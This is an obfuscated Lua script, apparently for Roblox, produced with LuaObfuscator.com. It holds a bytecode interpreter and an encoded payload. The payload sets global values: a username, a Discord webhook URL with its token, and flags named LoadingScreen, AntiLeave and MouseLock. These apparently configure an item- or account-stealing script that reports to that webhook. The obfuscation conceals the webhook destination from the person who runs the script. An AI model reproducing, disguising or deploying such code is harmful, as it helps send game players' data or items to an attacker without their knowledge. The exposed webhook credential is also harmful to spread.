--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v71=(v31/((5 -3)^(v32-(2 -(1 + 0)))))%((3 -(878 -(282 + 595)))^(((v33-(2 -1)) -(v32-((2257 -(1523 + 114)) -(555 + 64)))) + (932 -(857 + 74)))) ;return v71-(v71%1) ;else local v72=(570 -(367 + 201))^(v32-((834 + 94) -(214 + 713))) ;return (((v31%(v72 + v72))>=v72) and 1) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + ((120 -(32 + 85)) -0) );v19=v19 + ((1048 + 21) -(68 + 997)) ;return (v37 * 16777216) + (v36 * ((14815 + 51991) -(226 + 1044))) + (v35 * (1114 -(1815 -(892 + 65)))) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;local v45;local v46;while true do if (v38==(1 -0)) then v41=nil;v42=nil;v38=4 -2 ;end if (v38==(14 -10)) then while true do if (v39~=1) then else local v95=867 -(550 + 317) ;while true do if (v95==0) then v42=nil;v43=nil;v95=1;end if (v95~=1) then else v39=2;break;end end end if (v39==3) then v46=nil;while true do local v98=0;while true do if (v98==1) then if (v40==2) then local v106=0 -0 ;local v107;while true do if (0==v106) then v107=0 -0 ;while true do if (v107==1) then return v44;end if (v107==0) then local v127=0;while true do if (v127~=(0 -0)) then else for v131=286 -(134 + 151) ,v24() do local v132=1665 -(970 + 695) ;local v133;local v134;while true do if (v132~=0) then else v133=0 -0 ;v134=nil;v132=1991 -(582 + 1408) ;end if (1~=v132) then else while true do if (v133==(0 -0)) then v134=v22();if (v21(v134,1,1 -0 )==(0 -0)) then local v138=1824 -(1195 + 629) ;local v139;local v140;local v141;local v142;local v143;while true do if (2==v138) then v143=nil;while true do if (v139~=1) then else local v144=0;while true do if (v144==(0 -0)) then v142=nil;v143=nil;v144=1;end if (v144~=(242 -(187 + 54))) then else v139=782 -(162 + 618) ;break;end end end if (v139==0) then local v145=0 + 0 ;while true do if ((1 + 0)~=v145) then else v139=1;break;end if (v145==0) then v140=0 -0 ;v141=nil;v145=1 -0 ;end end end if (2==v139) then while true do if (v140==0) then local v146=0;local v147;while true do if (v146==(0 + 0)) then v147=0;while true do if (v147==(1637 -(1373 + 263))) then v140=1;break;end if (v147==(1000 -(451 + 549))) then local v156=0 + 0 ;local v157;while true do if (v156==0) then v157=0;while true do if (v157~=1) then else v147=1;break;end if (v157==0) then local v165=0;while true do if (0==v165) then v141=v21(v134,2 -0 ,3);v142=v21(v134,6 -2 ,1390 -(746 + 638) );v165=1;end if (v165~=(1 + 0)) then else v157=1 -0 ;break;end end end end break;end end end end break;end end end if (1==v140) then local v148=341 -(218 + 123) ;local v149;local v150;while true do if (v148~=(1582 -(1535 + 46))) then else while true do if (v149==(0 + 0)) then v150=0;while true do if (v150~=(0 + 0)) then else local v159=560 -(306 + 254) ;local v160;while true do if (v159~=0) then else v160=0;while true do if ((0 + 0)==v160) then v143={v23(),v23(),nil,nil};if (v141==0) then local v166=1467 -(899 + 568) ;local v167;local v168;while true do if (v166==(0 + 0)) then v167=0;v168=nil;v166=1;end if (v166~=(2 -1)) then else while true do if (v167~=(603 -(268 + 335))) then else v168=0;while true do if ((290 -(60 + 230))==v168) then v143[3]=v23();v143[576 -(426 + 146) ]=v23();break;end end break;end end break;end end elseif (v141==(1 + 0)) then v143[3]=v24();elseif (v141==2) then v143[1459 -(282 + 1174) ]=v24() -(2^16) ;elseif (v141~=(814 -(569 + 242))) then else local v171=0 -0 ;local v172;local v173;local v174;while true do if (v171==(0 + 0)) then v172=1024 -(706 + 318) ;v173=nil;v171=1;end if ((1252 -(721 + 530))~=v171) then else v174=nil;while true do if (v172~=(1272 -(945 + 326))) then else while true do if (v173==(0 -0)) then v174=0 + 0 ;while true do if (v174==(700 -(271 + 429))) then v143[3 + 0 ]=v24() -((1502 -(1408 + 92))^16) ;v143[1090 -(461 + 625) ]=v23();break;end end break;end end break;end if (v172~=0) then else local v177=1288 -(993 + 295) ;while true do if (v177~=1) then else v172=1;break;end if (v177==(0 + 0)) then v173=1171 -(418 + 753) ;v174=nil;v177=1;end end end end break;end end end v160=1;end if (v160==1) then v150=1;break;end end break;end end end if (v150==(1 + 0)) then v140=1 + 1 ;break;end end break;end end break;end if ((0 + 0)==v148) then v149=0 + 0 ;v150=nil;v148=1;end end end if (v140~=(531 -(406 + 123))) then else local v151=0;local v152;while true do if (v151==0) then v152=1769 -(1749 + 20) ;while true do if (0==v152) then local v158=0 + 0 ;while true do if (v158==(1322 -(1249 + 73))) then if (v21(v142,1,1)~=(1 + 0)) then else v143[1147 -(466 + 679) ]=v46[v143[4 -2 ]];end if (v21(v142,5 -3 ,2)==1) then v143[3]=v46[v143[3]];end v158=1901 -(106 + 1794) ;end if (v158==1) then v152=1 + 0 ;break;end end end if ((1 + 0)==v152) then v140=3;break;end end break;end end end if (v140~=(8 -5)) then else if (v21(v142,7 -4 ,3)==1) then v143[4]=v46[v143[4]];end v41[v131]=v143;break;end end break;end end break;end if (v138~=(114 -(4 + 110))) then else v139=584 -(57 + 527) ;v140=nil;v138=1428 -(41 + 1386) ;end if (v138==(104 -(17 + 86))) then v141=nil;v142=nil;v138=2;end end end break;end end break;end end end for v135=1,v24() do v42[v135-1 ]=v29();end v127=1 + 0 ;end if (v127~=1) then else v107=1 -0 ;break;end end end end break;end end end break;end if (v98==(0 -0)) then if (v40~=0) then else local v108=166 -(122 + 44) ;while true do if (v108==0) then local v124=0 -0 ;while true do if (v124~=0) then else v41={};v42={};v124=1;end if (v124==(3 -2)) then v108=1 + 0 ;break;end end end if ((1 + 1)==v108) then v40=1 -0 ;break;end if (v108==1) then local v125=0;while true do if (1~=v125) then else v108=2;break;end if (v125==(65 -(30 + 35))) then v43={};v44={v41,v42,nil,v43};v125=1213 -(323 + 889) ;end end end end end if (v40==1) then v45=v24();v46={};for v112=1,v45 do local v113=0 -0 ;local v114;local v115;local v116;while true do if (v113==(580 -(361 + 219))) then v114=320 -(53 + 267) ;v115=nil;v113=1;end if (v113==1) then v116=nil;while true do if (v114==(1 + 0)) then if (v115==(414 -(15 + 398))) then v116=v22()~=0 ;elseif (v115==(984 -(18 + 964))) then v116=v25();elseif (v115==(11 -8)) then v116=v26();end v46[v112]=v116;break;end if (v114==(0 + 0)) then local v129=0 + 0 ;local v130;while true do if (v129==(850 -(20 + 830))) then v130=0;while true do if (v130~=1) then else v114=1;break;end if (v130~=0) then else local v137=0 + 0 ;while true do if (1==v137) then v130=127 -(116 + 10) ;break;end if (v137==0) then v115=v22();v116=nil;v137=1;end end end end break;end end end end break;end end end v44[1 + 2 ]=v22();v40=2;end v98=1;end end end break;end if (v39~=0) then else local v96=738 -(542 + 196) ;while true do if (0==v96) then v40=0 -0 ;v41=nil;v96=1 + 0 ;end if (v96==1) then v39=1 + 0 ;break;end end end if (v39==2) then local v97=0;while true do if (v97~=(0 + 0)) then else v44=nil;v45=nil;v97=1;end if (v97~=1) then else v39=3;break;end end end end break;end if ((0 -0)~=v38) then else v39=0 -0 ;v40=nil;v38=1;end if (v38==2) then v43=nil;v44=nil;v38=1554 -(1126 + 425) ;end if (v38==(408 -(118 + 287))) then v45=nil;v46=nil;v38=4;end end end v30=nil;v18=7;end if (v18==4) then function v25()local v47=0 -0 ;local v48;local v49;local v50;local v51;local v52;local v53;while true do if (((2253 -(369 + 761)) -(118 + 1003))==v47) then v52=v21(v49,61 -40 ,408 -(142 + 235) );v53=((v21(v49,145 -113 )==1) and  -(1 + 0)) or (1 + 0) ;v47=980 -(553 + 424) ;end if (v47==(1 -0)) then v50=1 + 0 ;v51=(v21(v49,1,20 + 0 ) * (((2 -0) + 0)^(14 + 18))) + v48 ;v47=2 + 0 ;end if (v47==(6 -3)) then if (v52==(0 -0)) then if (v51==(0 -0)) then return v53 * 0 ;else local v99=0;while true do if (v99==(0 + 0)) then v52=4 -3 ;v50=(1426 -673) -(239 + 514) ;break;end end end elseif (v52==(719 + 1328)) then return ((v51==(1329 -(797 + 532))) and (v53 * ((1 + (238 -(64 + 174)))/(0 + 0 + 0)))) or (v53 * NaN) ;end return v8(v53,v52-(1514 -491) ) * (v50 + (v51/((4 -2)^52))) ;end if (v47==(1202 -(373 + (1165 -(144 + 192))))) then v48=v24();v49=v24();v47=732 -(476 + 255) ;end end end v26=nil;function v26(v54)local v55;if  not v54 then v54=v24();if (v54==(216 -(42 + 174))) then return "";end end v55=v3(v16,v19,(v19 + v54) -(1 + 0) );v19=v19 + v54 ;local v56={};for v69=1, #v55 do v56[v69]=v2(v1(v3(v55,v69,v69)));end return v6(v56);end v18=5;end if (v18==2) then function v22()local v57=v1(v16,v19,v19);v19=v19 + 1 ;return v57;end v23=nil;function v23()local v58=0 + 0 ;local v59;local v60;while true do if (v58==1) then return (v60 * (109 + 147)) + v59 ;end if (v58==0) then v59,v60=v1(v16,v19,v19 + ((1104 + 402) -(363 + 1141)) );v19=v19 + (1582 -(1183 + 397)) ;v58=2 -1 ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v61)if (v1(v61,2)==79) then local v73=0;while true do if (v73==0) then v20=v0(v3(v61,1,1));return "";end end else local v74=v2(v0(v61,16));if v20 then local v78=v5(v74,v20);v20=nil;return v78;else return v74;end end end);v18=1;end if (v18==7) then function v30(v62,v63,v64)local v65=0;local v66;local v67;local v68;while true do if (v65==1) then v68=v62[3];return function(...)local v79=v66;local v80=v67;local v81=v68;local v82=v28;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do local v94=0;while true do if (v94==1) then if (v92<=2) then if (v92<=0) then v89[v91[2]]=v64[v91[3]];elseif (v92==1) then do return;end else v64[v91[3]]=v89[v91[2]];end elseif (v92<=4) then if (v92==3) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end else v89[v91[2]][v91[3]]=v91[4];end elseif (v92>5) then v89[v91[2]]=v91[3];else v83=v91[3];end v83=v83 + 1 ;break;end if (v94==0) then v91=v79[v83];v92=v91[1];v94=1;end end end end;end if (v65==0) then v66=v62[1];v67=v62[2];v65=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0D3O00028O0003083O00557365724E616D65030B3O006E696E6A6133343533323403073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313235383137352O303135363833372O38392F4F4A3671795150337058796E554834632D444357596A6834517869334347692O4C756D734A6F2D4E756F503850716142335F6F4A4D7164545F384A376778385A51694D56026O00F03F03093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O01027O004003093O00416E74694C6561766503093O004D6F7573654C6F636B00183O0012063O00013O0026033O0008000100010004053O00080001001206000100033O001202000100023O001206000100053O001202000100043O0012063O00063O0026033O000F000100060004053O000F0001001206000100033O001202000100073O00122O000100083O00300400010009000A0012063O000B3O0026033O00010001000B0004053O0001000100122O000100083O0030040001000C000A00122O000100083O0030040001000D000A0004053O001700010004053O000100012O00013O00017O00",v9(),...);end
